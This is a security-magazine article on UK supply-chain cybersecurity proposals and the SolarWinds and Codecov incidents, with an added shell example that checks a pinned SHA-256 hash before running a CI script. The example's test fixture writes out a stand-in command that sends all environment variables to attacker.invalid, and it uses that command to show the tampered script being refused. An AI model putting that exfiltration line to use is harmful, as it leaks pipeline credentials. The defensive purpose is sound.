Digital supply chains

by Mark Rowe

The UK government recently announced a new proposal to strengthen the cybersecurity of the nation’s digital supply chains, writes Ehud Amiri, VP Product Management at the cloud security company Aqua Security.

The proposal may require IT service vendors to follow the National Cyber Security Centre’s (NCSC) Cyber Assessment Framework (CAF). It follows a study published by the Department for Digital, Culture, Media & Sport (DCMS) of directors, chairs and CEOs at the UK’s largest organisations, which found that 91 per cent see cyberattacks as an urgent threat to business operations, up sharply from the 84 per cent surveyed in 2020. However, just 69 per cent of the organisations surveyed are proactively addressing cybersecurity risk in their supply chain.

Additional proposals include new rules to ensure that public sector organisations only acquire technology from suppliers whose cybersecurity measures have been evaluated and found effective. Service providers will therefore have to deliver dependable protection and offer more to their customers, as the number of cyberattacks in the UK has reached a new record. Critical services and supply chains, for example Covid-19 vaccine research and distribution, have been targeted repeatedly. The most notable case was the SolarWinds attack, described by the NCSC as “one of the most serious cyber intrusions of recent times” because of its widespread impact on critical services.

Most modern software projects are assembled from ready-made components: open source packages, code supplied by third-party software vendors, proprietary custom code, and functionality consumed via external APIs. These components are used throughout an organisation’s Software Development Life Cycle (SDLC) to deliver software products quickly, at high quality and in an automated way.

The advantage of a digital supply chain is that it accelerates application development. However, it also expands the attack surface to include weaknesses in the SDLC process itself, as well as in the open source or third-party components that flow through the supply chain. If not mitigated correctly, this expanded attack surface can create critical security gaps: it obscures visibility of security risk in upstream artefacts and complicates remediation for outsourced resources. A single compromised off-the-shelf component can make many organisations vulnerable to attack.

According to the DCMS report, there is robust support from industry leaders eager to see new legislation that improves security throughout the supply chain. Over time, security providers must be certain that their applications and software are as hard to compromise as possible, especially if they are the first point of contact for access to sensitive government information or critical public services.

Data from our own research team, Nautilus, shows a wide range in the complexity and evasion capabilities of recent attacks. For instance, the team saw malicious container images on Docker Hub built to hijack organisations’ compute resources to mine cryptocurrency. Also of note, earlier this year Codecov disclosed an incident report detailing how an attacker obtained a credential through a mistake in how Codecov built its Docker images. That credential let the attacker modify Codecov’s Bash Uploader script, and the modified script then stole credentials from the Continuous Integration/Continuous Delivery (CI/CD) environments of Codecov’s customers.

Sophisticated attackers find this new attack vector especially appealing because most organisations are still not focusing their security effort in this direction. Additionally, a successful attack on a popular package can have a massive impact on potentially thousands of organisations.

How to take action

Because supply chain attacks will keep evolving, a new set of tools purpose-built for securing the digital supply chain is critical, and organisations need to adjust their security practices with this in mind. There are key actions that organisations can take to better protect themselves from these threats.

With today’s pace and velocity of release cycles, development teams must embed security from the start to ensure the integrity of the software and code. Organisations should include security in every step of their SDLC. This involves evaluating every ready-made component as early as possible, before development teams use it; automating CI/CD security and code tamper detection; and protecting the final artefacts with dynamic threat analysis for containers plus scanning for vulnerabilities, malware and sensitive data.
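The Codecov incident described above and the “code tamper detection” step come down to one habit: never execute a script fetched at build time unless its content matches what was reviewed. The following is an added example, not code from the article, from Aqua or from Codecov. It assumes a POSIX shell with sha256sum, shasum or openssl available, and uses a constructed fixture (a minimal uploader script and a tampered copy) in place of a real download; the pinned digest is computed from the known-good copy here, standing in for a value committed to the repository alongside the CI configuration.

```shell
#!/bin/sh
# Added example: run a CI helper script only if it matches a pinned SHA-256.
# The pattern it replaces is the one that made the Codecov compromise effective:
#   curl -fsSL https://vendor.example/uploader.sh | bash
# which runs whatever the upstream host serves, with every CI secret in scope.
# (The URL above is a placeholder; nothing in this file touches the network.)
set -eu

# Print the SHA-256 hex digest of a file, whichever tool the runner has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{print $1}'
    else
        openssl dgst -sha256 "$1" | awk '{print $NF}'
    fi
}

# Execute script $1 only if its digest equals the pinned digest $2.
# Returns 1 without running anything if the content changed upstream,
# so a modified uploader never gets to read the pipeline's environment.
run_if_pinned() {
    actual=$(sha256_of "$1")
    if [ "$actual" != "$2" ]; then
        echo "refusing to run $1: sha256 $actual does not match pinned $2" >&2
        return 1
    fi
    sh "$1"
}

# Constructed fixture (not a real vendor script): a minimal uploader and a
# tampered copy that appends an exfiltration line of the kind seen in the
# Codecov incident. attacker.invalid is a reserved, unresolvable name.
make_fixtures() {
    dir=$(mktemp -d)
    cat > "$dir/uploader.sh" <<'EOF'
#!/bin/sh
echo "uploading coverage report"
EOF
    cp "$dir/uploader.sh" "$dir/uploader-tampered.sh"
    echo 'env | curl -sS -X POST --data-binary @- https://attacker.invalid/upload' \
        >> "$dir/uploader-tampered.sh"
    echo "$dir"
}

main() {
    dir=$(make_fixtures)
    # In a real pipeline this value is committed next to the CI config and
    # changes only through a reviewed pull request; here it is derived from
    # the known-good copy so the example runs offline.
    pinned=$(sha256_of "$dir/uploader.sh")

    run_if_pinned "$dir/uploader.sh" "$pinned"   # matches the pin, so it runs
    if run_if_pinned "$dir/uploader-tampered.sh" "$pinned"; then
        echo "BUG: tampered script was executed" >&2
        exit 1
    fi
    rm -rf "$dir"
}
main
```

A pinned digest proves only that the file is the one that was reviewed, not that the reviewed version was itself clean; where the vendor publishes a detached signature for the script, verify that as well. The same check belongs on every other artefact pulled into a build, including container base images and package downloads.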


© 2024 Professional Security Magazine. All rights reserved.